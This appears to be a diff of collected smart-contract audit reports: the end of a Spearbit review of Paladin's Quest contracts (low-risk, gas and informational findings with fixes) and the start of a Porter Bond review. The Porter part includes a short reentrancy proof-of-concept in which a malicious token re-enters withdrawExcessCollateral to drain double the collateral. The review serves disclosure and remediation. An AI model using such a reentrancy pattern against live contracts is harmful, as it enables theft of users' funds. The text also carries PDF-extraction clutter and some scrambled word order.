least 1, but minRewardPerVotePerToken[] could be 0 and even if minRewardPerVotePerToken is non zero but still low, the number of tokes required is neglectable when using tokens with 18 decimals. Requiring a minimum amount of tokens also helps to prevent the creation of spam quests. 14 function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { return questsByPeriod[period]; // could run out of gas } function createQuest(...) { ... require(duration > 0, "QuestBoard: Incorrect duration"); require(objective >= minObjective, "QuestBoard: Objective too low"); ... require(rewardPerVote >= minRewardPerVotePerToken[rewardToken], "QuestBoard: RewardPerVote too low"); ... vars.rewardPerPeriod = (objective * rewardPerVote) / UNIT; // can be 0 ==> totalRewardAmount can be 0 require((totalRewardAmount * platformFee)/MAX_BPS == feeAmount, "QuestBoard: feeAmount incorrect"); // feeAmount can be 0 ... require((vars.rewardPerPeriod * duration) == totalRewardAmount, "QuestBoard: totalRewardAmount incorrect"); ... IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount); IERC20(rewardToken).safeTransferFrom(vars.creator, questChest, feeAmount); ... ,! ,! ,! ,! } constructor(address _gaugeController, address _chest){ ... minObjective = 1000 * UNIT; // initial value, but can be overwritten ... } function updateMinObjective(uint256 newMinObjective) external onlyOwner { require(newMinObjective > 0, "QuestBoard: Null value"); // perhaps set higher minObjective = newMinObjective; } function whitelistToken(address newToken, uint256 minRewardPerVote) public onlyAllowed { // geen isAlive??? ... minRewardPerVotePerToken[newToken] = minRewardPerVote; // no minimum value required ... ,! } Recommendation: Consider setting (higher) minimal values for minRewardPerVotePerToken[] and minObjec- tive. Paladin: The parameters for minObjective and minRewardPerVote will be carefully calculated off-chain and can be increased. Fake Quests would be skipped by using closePartOfQuestPeriod(). Spearbit: Acknowledged (solution based on procedures, not technical). 15 +5.3.6 Non existing states are considered active Severity: Low Risk Context: QuestBoard.sol#L750-L815 The Description: periods- if a state is checked of a non existing However, ByQuest[questIDs[i]][period] is active. questIDs[i] or a questID that has no quest in that period, then periodsByQuest[questIDs[i]][period] is empty and periodsByQuest[questIDs[i]][period].currentState == 0. closePartOfQuestPeriod() function verifies state the of if As PeriodState.ACTIVE ==0, the stated is considered to be active and the require() doesn’t trigger and pro- cessing continues. Luckily as all other values are also 0 (especially _questPeriod.rewardAmountPerPeriod), toDistributeAmount will be 0 and no tokens are sent. However slight future changes in the code might introduce unwanted effects. enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } // ACTIVE == 0 function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive ,! onlyAllowed nonReentrant { ... for(uint256 i = 0; i < length;){ ... require( periodsByQuest[questIDs[i]][period].currentState == PeriodState.ACTIVE, // doesn't work ,! if questIDs[i] & period are empty "QuestBoard: Period already closed" ); Recommendation: Don’t use a value of 0 as a valid state, for example in the following way: - enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } + enum PeriodState { ZERO, ACTIVE, CLOSED, DISTRIBUTED } this also requires setting the ACTIVE state explicitly in functions createQuest() and increaseQuestDu- Note: ration(). Alternatively use periodsByQuest[ questIDs[i] ][period].periodStart !=0 to verify the struct is filled. Paladin: Implemented in #10. Spearbit: Acknowledged. +5.3.7 Critical changes should use two-step process Severity: Low Risk Context: Ownable.sol#L62, QuestBoard#L27, MultiMerkleDistributor#L24 and QuestTreasureChest#L23 Description: The QuestBoard.sol, QuestTreasureChest.sol and QuestTreasureChest.sol contracts inherit from OpenZeppelin’s Ownable contract which enables the onlyOwner role to transfer ownership to another address. It’s possible that the onlyOwner role mistakenly transfers ownership to the wrong address, resulting in a loss of the onlyOwner role. This is an unwanted situation because the owner role is neccesary for several methods. Recommendation: Consider implementing a two step process where the owner nominates an account and the nominated account needs to call an acceptOwnership() function for the transfer of ownership to fully succeed. This ensures the nominated EOA account is a valid and active account. Paladin: Implemented in #14. Spearbit: Acknowledged. 16 +5.3.8 Prevent accidental call of emergencyUpdatequestPeriod() Severity: Low Risk Context: MultiMerkleDistributor.sol#L260-L275, MultiMerkleDistributor.sol#L311-L322 Description: Functions updateQuestPeriod() and emergencyUpdatequestPeriod() are very similar. However, if function emergencyUpdatequestPeriod() is accidentally used instead of updateQuestPeriod(), then period isn’t push()ed to the array questClosedPeriods[]. This means function getClosedPeriodsByQuests() will not be able to retreive all the closed periods. function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyAllowed returns(bool) { ... questClosedPeriods[questID].push(period); ... questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyOwner returns(bool) { ... // no push() questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! } Recommendation: Make sure that emergencyUpdatequestPeriod() can only be called after updateQuestPe- riod() has been called by adding the following check to emergencyUpdatequestPeriod(): require(questMerkleRootPerPeriod[questID][period] !=0, "MultiMerkle: Not closed yet"); Paladin: Implemented in #4. Spearbit: Acknowledged. +5.3.9 Usage of deprecated safeApprove Severity: Low Risk Context: QuestTreasureChest.sol#L53 Description: OpenZeppelin safeApprove implementation is deprecated. Reference. Using this deprecated func- tion can lead to unintended reverts and potential locking of funds. SafeERC20.safeApprove() Insecure Behaviour. Recommendation: Consider replacing safeApprove() with safeIncreaseAllowance() or safeDecreaseAl- lowance() instead regarding Openzeppelin comment. Paladin: Implemented in #3. Spearbit: Acknowledged. 17 +5.3.10 questID on the NewQuest event should be indexed Severity: Low Risk Context: File.sol#L129 Description: The NewQuest event currently does not have questID set to indexed which goes against the pattern set by the other events in the contract where questID is actually indexed. Recommendation: Add indexed to questID on the NewQuest event to aline with all other events in the file in which questID is indexed. - + event NewQuest( uint256 questID, uint256 indexed questID address indexed creator, address indexed gauge, address rewardToken, uint48 duration, uint256 startPeriod, uint256 objectiveVotes, uint256 rewardPerVote ); Paladin: Implemented in #2. Spearbit: Acknowledged. +5.3.11 Add validation checks on addresses Severity: Low Risk Context: QuestBoard.sol#L182, MultiMerkleDistributor.sol#L81, MultiMerkleDistributor.sol#L126, MultiMerkleDis- tributor.sol#L185 Description: Missing validation checks on addresses passed into the constructor functions. Adding these checks on _gaugeController and _chest can prevent costly errors the during deployment of the contract. Also in function claim() and claimQuest() there is no zero check for for account argument. Recommendation: Consider doing the following: In the constructor of QuestBoard, ensure that _gaugeController and _chest are non zero addresses and also that they are unique from one another. contract QuestBoard is Ownable, ReentrancyGuard { constructor(address _gaugeController, address _chest){ require(_gaugeController != address(0), "Zero Address"); require(_chest != address(0), "Zero Address"); require(_gaugeController != _chest, "Duplicate address"); ... + + + } } contract MultiMerkleDistributor is Ownable { constructor(address _questBoard){ require(questBoard != address(0), "Zero Address"); questBoard = _questBoard; + } } In functions claim() and claimQuest() add: + require(account!= address(0), "Zero Address"); 18 Paladin: Implemented in #1 and #17. Spearbit: Acknowledged. 5.4 Gas Optimization +5.4.1 Changing public constant variables to non-public can save gas Severity: Gas Optimization Context: QuestBoard.sol#L38 , QuestBoard.sol#L36, QuestBoard.sol#L34 Description: Several constants are public and thus have a getter function. called from the outside, therefore it is not necessary to make them public. It is unlikely for these values to be Recommendation: Make constants that do not need to be accessible from the outside private: - + - + - + uint256 public constant WEEK = 604800; uint256 private constant WEEK = 604800; uint256 public constant UNIT = 1e18; uint256 private constant UNIT = 1e18; uint256 public constant MAX_BPS = 10000; uint256 private constant MAX_BPS = 10000; Paladin: Implemented in #7. Spearbit: Acknowledged. +5.4.2 Using uint instead of bool to optimize gas usage Severity: Gas Optimization Context: QuestTreasureChest.sol#L27 Description: A bool is more costly than uint256. Because each write action generates an additional SLOAD to read the contents of the slot, change the bits occupied by bool and finally write back. contract BooleanTest { mapping(address => bool) approvedManagers; // Gas Cost : 44144 function approveManager(address newManager) external{ approvedManagers[newManager] = true; } mapping(address => uint256) approvedManagersWithoutBoolean; // Gas Cost : 44069 function approveManagerWithoutBoolean(address newManager) external{ approvedManagersWithoutBoolean[newManager] = 1; } } Recommendation: Consider changing bool definitions with uint. Paladin: Acknowledged, but will not make the changes. Spearbit: Acknowledged (not implemented). 19 +5.4.3 Optimize && operator usage Severity: Gas Optimization Context: QuestBoard.sol#L292, QuestBoard.sol#L297, QuestBoard.sol#L389, QuestBoard.sol#L457 Description: The check && consumes more gas than using multiple require statements. Example test can be seen below: //Gas Cost: 22515 function increaseQuestReward(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) ,! public { require(newRewardPerVote != 0 && addedRewardAmount != 0 && feeAmount != 0, "QuestBoard: Null ,! amount"); } //Gas Cost: 22477 function increaseQuestRewardTest(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 ,! feeAmount) public { require(newRewardPerVote != 0, "QuestBoard: Null amount"); require(addedRewardAmount != 0, "QuestBoard: Null amount"); require(feeAmount != 0, "QuestBoard: Null amount"); } Note : It costs more gas to deploy but it is worth it after X calls. Trade-offs should be considered. Recommendation: Consider using multiple require statements instead of && operator. Paladin: Considering the gas cost diff, and the diff of gas for deploy, and the fact that those functions might not used too many times (mainly to adapt the Quest parameters, but in case the Quest has a small duration, recreating a new one would be easier for users), this change was not implemented. Spearbit: Acknowledged (not implemented). +5.4.4 Unnecesary value set to 0 Severity: Gas Optimization Context: QuestBoard.sol#L713 Description: Since all default values in solidity are already 0 it riod.rewardAmountDistributed = 0; here as it should already be 0. is unnecessary to include _questPe- Recommendation: Consider removing _questPeriod.rewardAmountDistributed = 0; and adding a comment it is already 0. Paladin: Implemented in #9. Spearbit: Acknowledged. +5.4.5 Optimize unsigned integer comparison Severity: Gas Optimization Context: QuestBoard.sol#L295, QuestBoard.sol#L390, QuestBoard.sol#L975 Description: Check != 0 costs less gas compared to > 0 for unsigned integers in require statements with the optimizer enabled. While it may seem that > 0 is cheaper than !=0 this is only true without the optimizer being enabled and outside a require statement. If the optimizer is enabled at 10k and it is in a require statement, it would be more gas efficient. Recommendation: Change > 0 comparison with != 0. Paladin: Implemented in #7. Spearbit: Acknowledged. 20 +5.4.6 Use memory instead of storage in closeQuestPeriod() and closePartOfQuestPeriod() Severity: Gas Optimization Context: QuestBoard.sol#L678-L815 Description: In functions closeQuestPeriod() and closePartOfQuestPeriod() a storage pointer _quest is set to quests[questsForPeriod[i]]. This is normally used when write access to the location is need. Nevertheless _quest is read only, to a copy of quests[questsForPeriod[i]] is also sufficient. This can save some gas. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questsForPeriod[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questIDs[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! ,! } Recommendation: Replace storage with memory in the definition of _quest. - + Quest storage _quest = quests[questIDs[i]]; Quest memory _quest = quests[questIDs[i]]; Paladin: Implemented in #7. Spearbit: Acknowledged. +5.4.7 Revert string size optimization Severity: Gas Optimization Context: QuestBoard.sol#L303, QuestBoard.sol#L987 Description: Shortening revert strings to fit in 32 bytes will decrease deploy time gas and will decrease runtime gas when the revert condition has been met. Revert strings using more than 32 bytes require at least one additional mstore, along with additional operations for computing memory offset. Recommendation: Shorten the revert strings to fit in 32 bytes. Alternatively, the code could be modified to use custom errors, introduced in Solidity 0.8.4. Paladin: Changed from revert strings to Custom Errors in #15. Spearbit: Acknowledged. 21 +5.4.8 Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers Severity: Gas Optimization Context: QuestBoard.sol#L582-L667 Description: ByQuest[questID][_questPeriods[i]] several times. pointer to read and update values. This will save gas and also make the code more readable. periods- It is possible to set a pointer to this record and use that withdrawUnusedRewards() emergencyWithdraw() Functions and use function withdrawUnusedRewards(uint256 questID, address recipient) external isAlive nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState == PeriodState.ACTIVE) { ... } ... uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } ... } function emergencyWithdraw(uint256 questID, address recipient) external nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState != PeriodState.ACTIVE){ uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } } else { .. totalWithdraw += periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod; periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod = 0; } ... } Recommendation: Create a pointer, for example qp: QuestPeriod storage qp = periodsByQuest[questID][_questPeriods[i]; And replace periodsByQuest[questID][_questPeriods[i] with qp. Paladin: Implemented in #7. Spearbit: Acknowledged. 22 +5.4.9 Needless to initialize variables with default values Severity: Gas Optimization Context: MultiMerkleDistributor.sol#L168, MultiMerkleDistributor.sol#L193, MultiMerkleDistributor.sol#L189, QuestBoard.sol#L224, Quest- Board.sol#L560, QuestBoard.sol#L588, QuestBoard.sol#L592, QuestBoard.sol#L639, QuestBoard.sol#L698, QuestBoard.sol#L765 QuestBoard.sol#L330, QuestBoard.sol#L417, QuestBoard.sol#L491, Description: uint256 variables are initialized to a default value of 0 per Solidity docs. Setting a variable to the default value is unnecessary. Recommendation: Remove explicit initialization for default values. Paladin: Implemented in #7. Spearbit: Acknowledged. +5.4.10 Optimize the calculation of the currentPeriod Severity: Gas Optimization Context: QuestBoard.sol#L251-L255 Description: The retrieval of currentPeriod is relatively gas expensive because it requires an SLOAD instruction (100 gas) every time. Calculating (block.timestamp / WEEK) * WEEK; is cheaper (TIMESTAMP: 2 gas, MUL: 5 gas, DIV: 5 gas). Refer to evm.codes for more information. Additionally, there is a risk that the call to updatePeriod() is forgotten although it does not happen in the current code. function updatePeriod() public { if (block.timestamp >= currentPeriod + WEEK) { currentPeriod = (block.timestamp / WEEK) * WEEK; } } Note: it is also possible to do all calculations with (block.timestamp / WEEK) instead of (block.timestamp / WEEK) * WEEK, but as the Paladin project has indicated:"" This currentPeriod is a timestamp, showing the start date of the current period, and based from the Curve system (because we want the same timestamp they have in the GaugeController)." Recommendation: Remove updatePeriod() and replace the use of currentPeriod with a call to a function like getPeriod(): function getPeriod() public view returns(uint256) { return (block.timestamp / WEEK) * WEEK; } Paladin: Implemented in#16. Spearbit: Acknowledged. 23 +5.4.11 Change memory to calldata Severity: Gas Optimization Context: MerkleProof.sol#L38, MerkleProof.sol#L22 Description: For the function parameters, it is often more optimal to have the reference location to be calldata instead of memory. Changing bytes to calldata will decrease gas usage. OpenZeppelin Pull Request Recommendation: Change memory definition with calldata in the related code section. Paladin: We decided not to change the OZ dependencies used in this project. However, if the PR linked in this issue is correctly tested, approved and merged before the release of Quest, an update (with the correct tests and checks) of the MerkleProof.sol dependency could be done. Spearbit: Acknowledged. +5.4.12 Caching array length at the beginning of function can save gas Severity: Gas Optimization Context: QuestBoard.sol#L857, QuestBoard.sol#L764 MultiMerkleDistributor.sol#L167, MultiMerkleDistributor.sol#L192, QuestBoard.sol#L890, Description: Caching array length at the beginning of the function can save gas in the several locations. function multiClaim(address account, ClaimParams[] calldata claims) external { require(claims.length != 0, "MultiMerkle: empty parameters"); uint256 length = claims.length; // if this is done before the require, the require can use "length" ... } Recommendation: Consider introducing uint256 length = newToken.length; in the first line, then require() could use length. Paladin: Implemented in #7. Spearbit: Acknowledged. +5.4.13 Check amount is greater than 0 to avoid calling safeTransfer() unnecessarily Severity: Gas Optimization Context: QuestTreasureChest.sol#L63-L65 Description: A check should be added to make sure amount is greater than 0 to avoid calling safeTransfer() unnecessarily. Recommendation: function transferERC20(address token, address recipient, uint256 amount) external onlyAllowed nonReentrant { require(amount > 0, "Amount cannot be 0"); ,! + .... } Paladin: Implemented in #7. Spearbit: Acknowledged. 24 +5.4.14 Unchecked{++i} is more efficient than i++ Severity: Gas Optimization Context: QuestBoard.sol#L224, QuestBoard.sol#L316 Description: The function getAllQuestPeriodsForQuestId uses i++ which costs more gas than ++i, especially in a loop. Also, the createQuest function uses nextID += 1 which costs more gas than ++nextID. Finally the initialization of i = 0 can be skipped, as 0 is the default value. Recommendation: Use ++i instead of i++ to increment the value of an uint variable. Use unchecked where possible. Skip initialization to 0. Note: the unchecked pattern has been use elsewhere in the code too. function getAllQuestPeriodsForQuestId(uint256 questId) external view returns(QuestPeriod[] memory) { ... for(uint256 i = 0; i < nbPeriods; i++){ for(uint256 i; i < nbPeriods;){ periods[i] = periodsByQuest[questId][questPeriods[questId][i]]; unchecked{ ++i; } } return periods; - + + } function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; unchecked{ ++nextID; } ... - + } Paladin: Implemented in #7. Spearbit: Acknowledged. +5.4.15 Could replace claims[i].questID with questID Severity: Gas Optimization Context: MultiMerkleDistributor.sol#L194-L195 Description: Could replace claims[i].questID with questID (as they are equal due to the check above) Recommendation: Consider changing the code in the following way: - ,! + require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, "MultiMerkle: not updated yet"); require(questMerkleRootPerPeriod[questID][claims[i].period] != 0, "MultiMerkle: not updated yet"); Paladin: Implemented in #7. Spearbit: Acknowledged. 25 +5.4.16 Change function visibility from public to external Severity: Gas Optimization Context: QuestBoard.sol#L898 Description: The function updateRewardToken of the QuestBoard contract could be set external to save gas and improve code quality. Recommendation: Consider changing the function in the following way: - function updateRewardToken(address newToken, uint256 newMinRewardPerVote) public onlyAllowed + function updateRewardToken(address newToken, uint256 newMinRewardPerVote) external onlyAllowed Paladin: Implemented in #7. Spearbit: Acknowledged. +5.4.17 Functions isClaimed() and _setClaimed() can be optimized Severity: Gas Optimization Context: MultiMerkleDistributor.sol#L95-L113 Description: The functions isClaimed() and _setClaimed() of the contract MultiMerkleDistributor can be optimized to save gas. See OZ BitMaps for inspiration. Recommendation: Consider changing the functions in the following way: function isClaimed(uint256 questID, uint256 period, uint256 index) public view returns (bool) { - - + + uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; uint256 claimedWordIndex = index >> 8; uint256 claimedBitIndex = index & 0xff; uint256 claimedWord = questPeriodClaimedBitMap[questID][period][claimedWordIndex]; uint256 mask = (1 << claimedBitIndex); return claimedWord & mask == mask; return claimedWord & mask != 0; - + } function _setClaimed(uint256 questID, uint256 period, uint256 index) private { - - + + uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; uint256 claimedWordIndex = index >> 8; uint256 claimedBitIndex = index & 0xff; questPeriodClaimedBitMap[questID][period][claimedWordIndex] = questPeriodClaimedBitMap[questID][period][claimedWordIndex] | (1 << claimedBitIndex); questPeriodClaimedBitMap[questID][period][claimedWordIndex] |= (1 << claimedBitIndex); - ,! + } Paladin: Implemented in #7. Spearbit: Acknowledged. 26 5.5 Informational +5.5.1 Missing events for owner only functions Severity: Informational Context: QuestBoard.sol#L954, QuestBoard.sol#L964, QuestBoard.sol#L974 QuestBoard.sol#L914, QuestBoard.sol#L924, QuestBoard.sol#L934, QuestBoard.sol#L944, Description: Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. Recommendation: Add events to all owner functions that change critical parameters. Paladin: Implemented in #6. Spearbit: Acknowledged. +5.5.2 Use nonReentrant modifier in a consistent way Severity: Informational Context: MultiMerkleDistributor.sol#L126-L144, MultiMerkleDistributor.sol#L185-L216, MultiMerkleDistributor.sol#L296- L300 Description: The functions claim(), claimQuest() and recoverERC20() of contract MultiMerkleDistributor send tokens but don’t have a nonReentrant modifier. All other functions that send tokens do have this modifier. Note: as the checks & effects patterns is used this is not really necessary. function claim(...) public { ... IERC20(rewardToken).safeTransfer(account, amount); } function claimQuest(...) external { ... IERC20(rewardToken).safeTransfer(account, totalClaimAmount); } function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } Recommendation: Consider adding a nonReentrant modifier to claim(), claimQuest() and recoverERC20() to be more consistent with the rest of the code. Paladin: Implemented in #6. Spearbit: Acknowledged. 27 +5.5.3 Place struct definition at the beginning of the contract Severity: Informational Context: QuestBoard.sol#L258, MultiMerkleDistributor.sol#L148 Description: Regarding Solidity Style Guide, the struct definition can move to the beginning of the contract. Recommendation: Consider moving struct definition at the beginning of the contract. Paladin: For CreateVars, as this struct is only used inside the createQuest method (to avoid the StackTooDeep error), the choice was made to put that Struct here for faster understanding. And for ClaimParams, as it is used as parameter for the next methods, the choice to place the Struct here was also made for better clarity in the variables layout. Spearbit: Acknowledged. +5.5.4 Improve checks for past quests in increaseQuestReward() and increaseQuestObjective() Severity: Informational Context: QuestBoard.sol#L448-L574, QuestBoard.sol#L235-L242 Description: The functions increaseQuestReward() and increaseQuestObjective() check: newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote. This is true when the quest is in the past (e.g. currentPeriod is outside of the quest range), because all the values will be 0. Luckily execution is stopped at _getRemainingDuration(questID), however it would be more logical to put this check near the start of the function. function increaseQuestReward(...) ... { updatePeriod(); ... require(newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote, "QuestBoard: New reward must be higher"); ... uint256 remainingDuration = _getRemainingDuration(questID); require(remainingDuration > 0, "QuestBoard: no more incoming QuestPeriods"); ... ,! } The function _getRemainingDuration() reverts when the quest is in the past, as currentPeriod will be larger than lastPeriod. The is not what you would expect from this function. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; return (lastPeriod - currentPeriod) / WEEK; // can revert } Recommendation: In both the functions increaseQuestReward() and increaseQuestObjective(), move the check _getRemainingDuration() towards the beginning of the function. Adapt _getRemainingDuration() to return 0 if the quest is in the past. Or add a comment if the revert is the preferred action. Paladin: Implemented in #8. Spearbit: Acknowledged. 28 +5.5.5 Should make use of token.balanceOf(address(this)); to recover tokens Severity: Informational Context: MultiMerkleDistributorsol#L296 Description: Currently when calling the recoverERC20() function there is no way to calculate what the proper amount should be without having to check the contracts balance of token before hand. This will require an extra step and can be easily done inside the function itself. Recommendation: Consider using token.balanceOf(address(this)); to obtain the amount of the token to be transferred. Then the amount argument will not need to be passed in manually as an argument. A check should be added that the amount to transfer is larger than 0 as well. - function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { + function recoverERC20(address token) external onlyOwner returns(bool) { uint256 amount = token.balanceOf(address(this)); require(amount > 0, "Amount cannot be zero); IERC20(token).safeTransfer(owner(), amount); return true; + + } Paladin: Implemented in #6. Spearbit: Acknowledged. +5.5.6 Floating pragma is set Severity: Informational Context: All Contracts. Description: The current pragma Solidity directive is ^0.8.10. It is recommended to specify a specific compiler version to ensure that the byte code produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (for e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs. Recommendation: Lock the compiler to a specific version. pragma solidity 0.8.10; Paladin: Implemented in #6. Spearbit: Acknowledged. +5.5.7 Deflationary reward tokens are not handled uniformly across the protocol Severity: Informational Context: QuestBoard.sol#L307, QuestBoard.sol#L403, QuestBoard.sol#L478, QuestBoard.sol#L546 Description: The code base does not support rebasing/deflationary/inflationary reward tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest. Recommendation: rebasing/inflation/deflation reward tokens. Consider checking previous balance/after balance equals to amount for any + + + uint256 oldBalance = rewardToken.balanceOf(address(this)); IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount); uint256 newBalance = rewardToken.balanceOf(address(this)); require(oldBalance + totalRewardAmount == newBalance,"Fee-on-transfer Tokens Not Supported"); 29 Paladin: Since we have a whitelist for tokens that can be used for Quest rewards, this safeguard should act to prevent rebasing/inflation/deflation type of token (by possibly having to wrap them to be used for the rewards). Spearbit: Acknowledged (solution based on procedures, not technical). +5.5.8 Typo on comment Severity: Informational Context: QuestBoard.sol#L231 Description: Across the codebase, there is a typo on the comment. The comment can be seen from the below. * @dev Returns the number of periods to come for a give nQuest Recommendation: Consider correcting the typo and review the codebase to check for more to improve code readability. - + * @dev Returns the number of periods to come for a give nQuest * @dev Returns the number of periods to come for a given Quest Paladin: Implemented in #6. Spearbit: Acknowledged. +5.5.9 Require statement with gauge_types function call is redundant Severity: Informational Context: QuestBoard.sol#L293 Description: The gauge_types function of the Curve reverts when an invalid gauge is given as a parameter, the QuestBoard: Invalid Gauge error message will not be seen in the QuestBoard contract. The documentation can be seen from the Querying Gauge and Type Weights. function createQuest(...) ... { ... require(IGaugeController(GAUGE_CONTROLLER).gauge_types(gauge) >= 0, "QuestBoard: Invalid Gauge"); ... } Recommendation: Make sure you don’t rely on the message "QuestBoard: Invalid Gauge". Consider removing the require statement. Paladin: In the current state, working with the Curve Gauge Controller, this require is redundant, and should never be reached. But this was added, in case of future Quest deployements of copies of the Curve Gauge system, where that revert might have been modified, or the gauge type was customized, this require would act as expected to prevent creating quests for invalid Gauges (and so that, in case it’s removed, it will not be forgotten when needed). Spearbit: Acknowledged. 30 +5.5.10 Missing setter function for the GAUGE_CONTROLLER Severity: Informational Context: QuestBoard.sol#L31 Description: The GAUGE_CONTROLLER address is immutable and set in the constructor. If Curve adds a new version of the gauge controller, the value of GAUGE_CONTROLLER cannot be updated and the contract QuestBoard needs to be deployed again. address public immutable GAUGE_CONTROLLER; constructor(address _gaugeController, address _chest){ GAUGE_CONTROLLER = _gaugeController; ... } Recommendation: Consider defining a setter function for the GAUGE_CONTROLLER. Paladin: In case it does happen, it might be because the Controller system (and then maybe the voting process) would be changed, requiring to deploy a new version of the QuestBoard. We prefer to re-deploy a new version of Quest in the unlikely case the Gauge Controller is replaced in the Curve ecosystem. Spearbit: Acknowledged (solution based on redeploy). +5.5.11 Empty events emitted in killBoard() and unkillBoard() functions Severity: Informational Context: QuestBoard.sol#L160-162 Description: When an event is emitted, it stores the arguments passed in for the transaction logs. Currently the Killed() and Unkilled() events are emitted without any arguments passed into them defeating the purpose of using an event. Recommendation: Consider using block.timestamp as the argument passed into the Killed() and Unkilled() events as the value is used in both functions they are emitted in. - event Killed(); + event Killed(uint256 _killedTime); - event Unkilled(); + event UnKilled(uint256 _unkilledTime); Paladin: Implemented in #6. Spearbit: Acknowledged. 31 diff --git a/findings_newupdate/spearbit/Porter-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Porter-Spearbit-Security-Review.txt new file mode 100644 index 0000000..60944a8 --- /dev/null +++ b/findings_newupdate/spearbit/Porter-Spearbit-Security-Review.txt @@ -0,0 +1,11 @@ +5.1.1 Freeze Redeems if bonds too Large Severity: Medium Risk Context: Bond.sol#L309 Description: Issuing too many bonds can result in users being unable to redeem. This is caused by arithmetic overflow in previewRedeemAtMaturity. If a user’s bonds andpaidAmount’s (or bonds * nonPaidAmount) product is greater than 2**256, it will overflow, reverting all attempts to redeem bonds. Recommendation: Implement a safety check in the factory as follows: uint256 _safetyCheck_ = bonds * bonds; Or inside the initialize function: uint256 _safetyCheck_ = maxSupply * maxSupply; Or change bonds in factory/Bond.initialize to a type of uint128. This ensures that bonds.mulDivDown(paidAmount, bondSupply) is always computable without overflow, as paidAmount is at most maxSupply (set during initialize) and bonds is at most maxSupply (set during initialize). bonds * bonds passing the safety check ensures redeems remain functional. Porter: Implemented in PR #290. Spearbit: Acknowledged, recommendation has been implemented. +5.1.2 Reentrancy in withdrawExcessCollateral() and withdrawExcessPayment() functions. Severity: Medium Risk Context: Bond.sol#L212, Bond.sol#233 Description: withdrawExcessCollateral() and withdrawExcessPayment() enable the caller to withdraw excess collateral and payment tokens respectively. Both functions are guarded by an onlyOwner modifier, limiting their access to the owner of the contract. function withdrawExcessCollateral(uint256 amount, address receiver) external onlyOwner function withdrawExcessPayment(address receiver) external onlyOwner When transferring tokens, execution flow is handed over to the token contract. Therefore, if a malicious token manages to call the owner’s address it can also call these functions again to withdraw more tokens than required. As an example consider the following case where the collateral token’s transferFrom() function calls the owner’s address: 4 function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { if (reenter) { reenter = false; owner.attack(bond, amount); } address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } and the owner contract has a function: function attack(address _bond, uint256 _amount) external { IBond(_bond).withdrawExcessCollateral(_amount, address(this)); } When withdrawExcessCollateral() is called by owner, it allows it to withdraw double the amount via reentrancy. Recommendation: Consider applying the nonReentrant modifier on both of these functions. Porter: Implemented in PR #284. Spearbit: Acknowledged, recommendation has been implemented. 5.2 Low Risk +5.2.1 burn() and burnFrom() allow users to lose their bonds Severity: Low Risk Context: Bond#L31 Description: The Bond contract inherits from ‘ERC20BurnableUpgradeable. contract Bond is IBond, OwnableUpgradeable, ERC20BurnableUpgradeable, This exposes the burn() and burnFrom() functions to users who could get their bonds burned due to an error or a front-end attack. Recommendation: Consider: • Implementing an onlyOwner guard inside burn() because only the owner needs to be able to burn their bonds if these are not bought by any lenders. • Any restriction to the burnFrom(address account, uint256 amount) function which has to be considered in context with the refinancing plan. Porter: Due to low risk attack vector and additional complexity, we’ve decided to not restrict burn() and burn- From() functions. Spearbit: Acknowledged, recommendations have not been implemented. 5 +5.2.2 Missing two-step transfer ownership pattern 